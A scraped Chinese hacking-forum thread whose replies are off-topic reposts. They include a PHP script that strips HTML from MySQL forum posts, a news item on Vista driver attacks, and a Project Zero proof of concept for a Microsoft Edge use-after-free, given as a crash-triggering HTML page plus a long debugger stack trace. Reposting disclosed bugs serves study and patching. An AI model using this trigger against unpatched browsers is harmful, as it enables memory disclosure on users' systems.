最近看过此主题的会员

返回列表 发帖

想学技术,但自己又太笨了,怎么办?

混了好多黑站,还是没学好
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:zhute发表,本帖发表者zhute符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者zhute和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
http://www.zhute.cn 充气娃娃直销

回复 1# zhute

   其实,我也是相当的笨,只是没人了解罢了

    比如哪些哪些站呀?

  *****

  让我也去学学

   

TOP

不学无数的人才是笨者

TOP

加油,笨鸟先飞

TOP

对MYSQL数据库内容进行过滤的代码
作者:VINI5原载:LENK技术联盟转载请注明出处原理利用strip_tags函数对HTML代码的过滤保留机制对数据库内容进行特殊处理,详细请参看下面代码。当网站的数据量非常大时候可以采用此法进行数据转移或者数据过了在采集比较盛行的今天,这个方法处理内容是个不错的选择




<?php
header("content-type:text/html; charset=gb2312"); //设置网页编码
$conn=mysql_connect("localhost","databaseuser","PWD");//数据库连接
$db = mysql_select_db("databasename", $conn);
mysql_query("set names gb2312;");//一般查询数据出现乱码的解决办法 非常实用
$sql="select * from cdb_posts order by pid desc";
$res = mysql_query($sql,$conn);
while($row = mysql_fetch_object($res))
{
$sql="update cdb_posts set message='".strip_tags($row->message,"<p> <br>")."' where pid=".$row->pid;//过滤开始 保留标签<p><br>
//echo $sql."<br>";continue;//此处方便调试跟踪
$result = mysql_query($sql,$conn);
if(mysql_affected_rows()==-1)
$ifsuccess="<font color=red>操作失败</font>";
else
$ifsuccess="<font color=green>操作成功</font>";
echo $ifsuccess.$sql."<br>";
}
?>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

(*^__^*) 嘻嘻…… ,我来看看,我不说话


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

黑客曝Vista终极安全辅助工具 硬件驱动才是罪魁
近日一名俄罗斯安全专家在黑帽大会上向与会人员展示了一项惊人的发现——Windows vista驱动程序潜伏着令人难以致信的危险,其中ATI和NVIDA所提供的官方驱动问题尤为严重!
  这名专家名叫Joanna Rutkowska,是虚拟化技术领域的专家,曾在去年的黑帽大会上成功演示了“Blue Pill”的Windows攻击。通过Vista内建虚拟化技术,Blue Pill被作为恶意软件运行,它在启动时进行自激活,并在Vista虚拟化系统中给予自身一个系统管理员权限。Rutkowska通过Blue Pill,有效地获得了对系统的控制权,并且整个过程不会被Windows检测到,因此,它也就成了一个终极木马。
  虽然微软声称在Vista的最终发行版中已经修复了这个漏洞,但是从结果来看仍然存在许多可以攻击Windows Vista并安装恶意软件和木马的方式。
  在演示中,Ruthkowska通过使用NVIDIA驱动程序作为一个跳板,将代码写入至内核。Ruthkowska现场展示了其开发的一款木马,顺利地绕过了Vista的内核保护系统。
  Ruthkowska解释道:“问题全部出在NVIDIA身上,它的驱动程序并未做任何正确的检查,从而使攻击者可以对注册表进行任意读写。”


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Microsoft Edge textarea.defaultValue内存泄漏漏洞
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1255

There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.

PoC:

==========================================
-->

<!-- saved from url=(0014)about:internet -->
<script>
var n = 0;
function go() {
  document.addEventListener("DOMNodeRemoved", eventhandler);
  eventhandler();
}
function eventhandler() {
  n++; if(n==5) return; //prevent going into an infinite recursion
  t.defaultValue = "aaaaaaaaaaaaaaaaaaaa";
  f.reset();
}
</script>
<body onload=go()>
<form id="f">
<textarea id="t">aaa</textarea>

<!--
=========================================

This seems to be the same bug as https://bugs.chromium.org/p/project-zero/issues/detail?id=1076 only that one is in IE and this one is in Edge.

I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway:

=========================================

(1618.1258): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:WINDOWSSYSTEM32edgehtml.dll -
edgehtml!Ordinal125+0x6446c:
00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????

0:013> !heap -p -a 000001fa`3389cfd4
    address 000001fa3389cfd4 found in
    _DPH_HEAP_ROOT @ 1f20b961000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                1fa33116138:      1fa3389c000             2000
    00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047
    00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e
    00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031
    00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba
    00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34
    00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48
    00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63
    00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704
    00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7
    00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf
    00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245
    00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97
    00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7
    00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621
    000001fa1cf7057e +0x000001fa1cf7057e

0:013> r
rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000
rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000
rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010
r8=00000000ffffffff  r9=000001f212910000 r10=00007ffe85156fd0
r11=000001f212841a90 r12=0000000000000000 r13=0000000000000014
r14=000001fa3389cfd4 r15=000001f2128e8840
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
edgehtml!Ordinal125+0x6446c:
00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????

0:013> k
# Child-SP          RetAddr           Call Site
00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c
01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631
02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5
03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e
04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1
05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63
06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:WINDOWSSYSTEM32chakra.dll -
07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5
08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97
09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641
0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e
27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e
44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e
61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e
7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e
9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e
b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e
d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e
f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
